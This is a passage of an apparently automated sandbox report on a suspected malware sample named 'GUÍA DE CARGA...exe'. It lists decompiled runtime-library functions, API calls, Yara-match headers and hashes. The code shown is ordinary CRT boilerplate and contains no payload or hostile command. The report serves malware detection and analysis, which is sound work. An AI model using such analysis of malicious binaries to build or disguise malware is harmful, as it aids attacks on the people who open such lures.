                        0x00406396
                        0x004063a6
                        0x004063a6
                        0x00406396
                        0x004063a8
                        0x004063a9
                        0x00000000
                        0x004063ae
                        0x00406324
                        0x00406329
                        0x0040632b
                        0x0040632d
                        0x0040632d
                        0x00406335
                        0x00406352
                        0x0040635c
                        0x00406361
                        0x00000000
                        0x00000000
                        0x00406363
                        0x00406369
                        0x00406369
                        0x00000000
                        0x00406369
                        0x00406339
                        0x0040633d
                        0x00406342
                        0x00406346
                        0x00000000
                        0x00000000
                        0x00406348
                        0x00000000

                        APIs
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
                        • __alloca_probe_16.LIBCMT ref: 0040633D
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
                        • __freea.LIBCMT ref: 004063A9
                          • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                        Memory Dump Source
                        • Source File: 00000002.00000002.522080443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                        • String ID:
                        • API String ID: 313313983-0
                        • Opcode ID: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                        • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
                        • Opcode Fuzzy Hash: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                        • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405751, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 95%
                        			E00405751(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x412fc8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x40cd48 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x69238288
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










                        0x00405756
                        0x0040575a
                        0x00405761
                        0x00405765
                        0x00405773
                        0x00405789
                        0x0040578d
                        0x004057b6
                        0x004057b8
                        0x004057bc
                        0x004057bf
                        0x004057bf
                        0x004057c5
                        0x004057c7
                        0x00000000
                        0x004057c8
                        0x0040578f
                        0x00405798
                        0x004057a7
                        0x0040579a
                        0x0040579d
                        0x004057a3
                        0x004057a3
                        0x004057ab
                        0x00000000
                        0x004057ad
                        0x004057b0
                        0x004057b2
                        0x00000000
                        0x004057b2
                        0x004057ab
                        0x00405767
                        0x0040576c
                        0x00000000

                        APIs
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
                        • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
                        Memory Dump Source
                        • Source File: 00000002.00000002.522080443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad$ErrorLast
                        • String ID:
                        • API String ID: 3177248105-0
                        • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                        • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
                        • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                        • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00404320, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                        Download Yara Rule
                        C-Code - Quality: 71%
                        			E00404320(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x412064; // 0x7
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00403ECE(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00404192(_t25, _t31, 0x4132a4);
							E00403E03(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00403E03();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00403E8B(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x412064; // 0x7
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00403ECE(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00404192(_t27, _t32, 0x4132a4);
									E00403E03(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00403E03();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00405878(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00405878(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                        0x00404320
                        0x00404320
                        0x00404320
                        0x0040432a
                        0x0040432c
                        0x00404331
                        0x00404334
                        0x00404342
                        0x00404349
                        0x0040434e
                        0x00404351
                        0x00404354
                        0x00404366
                        0x0040436b
                        0x0040436d
                        0x00404378
                        0x0040437f
                        0x00404384
                        0x00404387
                        0x00404389
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040436f
                        0x0040436f
                        0x00000000
                        0x0040436f
                        0x00404356
                        0x00404356
                        0x00404357
                        0x00404357
                        0x0040435c
                        0x00404397
                        0x00404398
                        0x0040439e
                        0x004043a3
                        0x004043a6
                        0x004043a7
                        0x004043a8
                        0x004043af
                        0x004043b1
                        0x004043b3
                        0x004043b8
                        0x004043bb
                        0x004043c9
                        0x004043d5
                        0x004043d8
                        0x004043db
                        0x004043ed
                        0x004043f2
                        0x004043f4
                        0x004043ff
                        0x00404405
                        0x0040440d
                        0x0040440f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004043f6
                        0x004043f6
                        0x00000000
                        0x004043f6
                        0x004043dd
                        0x004043dd
                        0x004043de
                        0x004043de
                        0x00404411
                        0x00404412
                        0x00404412
                        0x004043bd
                        0x004043c3
                        0x004043c7
                        0x0040441a
                        0x0040441b
                        0x00404421
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004043c7
                        0x00404428
                        0x00404428
                        0x00404336
                        0x0040433c
                        0x00404340
                        0x0040438b
                        0x0040438c
                        0x00404396
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00404340

                        APIs
                        • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
                        • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
                        • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
                        • _abort.LIBCMT ref: 0040439E
                        Memory Dump Source
                        • Source File: 00000002.00000002.522080443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$_abort
                        • String ID:
                        • API String ID: 88804580-0
                        • Opcode ID: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
                        • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
                        • Opcode Fuzzy Hash: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
                        • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004025BA, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E004025BA() {
				void* _t4;
				void* _t8;

				E00402AE5();
				E00402A79();
				if(E004027D9() != 0) {
					_t4 = E0040278B(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00402815();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





                        0x004025ba
                        0x004025bf
                        0x004025cb
                        0x004025d0
                        0x004025d5
                        0x004025d7
                        0x004025e2
                        0x004025d9
                        0x004025d9
                        0x00000000
                        0x004025d9
                        0x004025cd
                        0x004025cd
                        0x004025cf
                        0x004025cf

                        APIs
                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
                          • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
                        Memory Dump Source
                        • Source File: 00000002.00000002.522080443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                        • String ID:
                        • API String ID: 1761009282-0
                        • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                        • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
                        • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                        • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00402E79, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                        Download Yara Rule
                        C-Code - Quality: 87%
                        			E00402E79(intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				intOrPtr* _t35;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				intOrPtr* _t43;
				intOrPtr* _t44;
				WCHAR* _t48;
				struct HINSTANCE__* _t49;
				struct HINSTANCE__* _t53;
				intOrPtr* _t56;
				struct HINSTANCE__* _t61;
				intOrPtr _t62;

				if(_a4 == 2 || _a4 == 1) {
					GetModuleFileNameW(0, 0x412bf8, 0x104);
					_t48 =  *0x412e7c; // 0x621c56
					 *0x412e80 = 0x412bf8;
					if(_t48 == 0 ||  *_t48 == 0) {
						_t48 = 0x412bf8;
					}
					_v8 = 0;
					_v16 = 0;
					E00402F98(_t48, 0, 0,  &_v8,  &_v16);
					_t61 = E0040311E(_v8, _v16, 2);
					if(_t61 != 0) {
						E00402F98(_t48, _t61, _t61 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t49 = E00404D5E(_t61);
							if(_t49 == 0) {
								_t56 = _v12;
								_t53 = 0;
								_t35 = _t56;
								if( *_t56 == 0) {
									L15:
									_t36 = 0;
									 *0x412e6c = _t53;
									_v12 = 0;
									_t49 = 0;
									 *0x412e74 = _t56;
									L16:
									E00403E03(_t36);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t35 = _t35 + 4;
									_t53 =  &(_t53->i);
								} while ( *_t35 != 0);
								goto L15;
							}
							_t36 = _v12;
							goto L16;
						}
						 *0x412e6c = _v8 - 1;
						_t42 = _t61;
						_t61 = 0;
						 *0x412e74 = _t42;
						goto L10;
					} else {
						_t43 = E00404831();
						_push(0xc);
						_pop(0);
						 *_t43 = 0;
						L10:
						_t49 = 0;
						L17:
						E00403E03(_t61);
						return _t49;
					}
				} else {
					_t44 = E00404831();
					_t62 = 0x16;
					 *_t44 = _t62;
					E00404639();
					return _t62;
				}
			}

















                        0x00402e86
                        0x00402eb4
                        0x00402eba
                        0x00402ec0
                        0x00402ec8
                        0x00402ecf
                        0x00402ecf
                        0x00402ed4
                        0x00402edb
                        0x00402ee2
                        0x00402ef4
                        0x00402efb
                        0x00402f1a
                        0x00402f26
                        0x00402f41
                        0x00402f44
                        0x00402f4b
                        0x00402f51
                        0x00402f58
                        0x00402f5b
                        0x00402f5d
                        0x00402f61
                        0x00402f6b
                        0x00402f6b
                        0x00402f6d
                        0x00402f73
                        0x00402f76
                        0x00402f78
                        0x00402f7e
                        0x00402f7f
                        0x00402f85
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00402f63
                        0x00402f63
                        0x00402f63
                        0x00402f66
                        0x00402f67
                        0x00000000
                        0x00402f63
                        0x00402f53
                        0x00000000
                        0x00402f53
                        0x00402f2c
                        0x00402f31
                        0x00402f33
                        0x00402f35
                        0x00000000
                        0x00402efd
                        0x00402efd
                        0x00402f02
                        0x00402f04
                        0x00402f05
                        0x00402f3a
                        0x00402f3a
                        0x00402f88
                        0x00402f89
                        0x00000000
                        0x00402f92
                        0x00402e8e
                        0x00402e8e
                        0x00402e95
                        0x00402e96
                        0x00402e98
                        0x00000000
                        0x00402e9d

                        APIs
                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe,00000104), ref: 00402EB4
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.522080443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: FileModuleName
                        • String ID: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe$pSb
                        • API String ID: 514040917-2092603238
                        • Opcode ID: d65f86be848b3adfa8fae1fc2f580f18a902642f457ef4245597d21aeb7a866c
                        • Instruction ID: f3d78f03607b51ffb72bb6c03706454bab976d361db7ab759f67f4c6569d847e
                        • Opcode Fuzzy Hash: d65f86be848b3adfa8fae1fc2f580f18a902642f457ef4245597d21aeb7a866c
                        • Instruction Fuzzy Hash: 9631C471A00219AFCB21DF99DA8899FBBBCEF84744B10407BF804A72C0D6F44E41DB98
                        Uniqueness

                        Uniqueness Score: -1.00%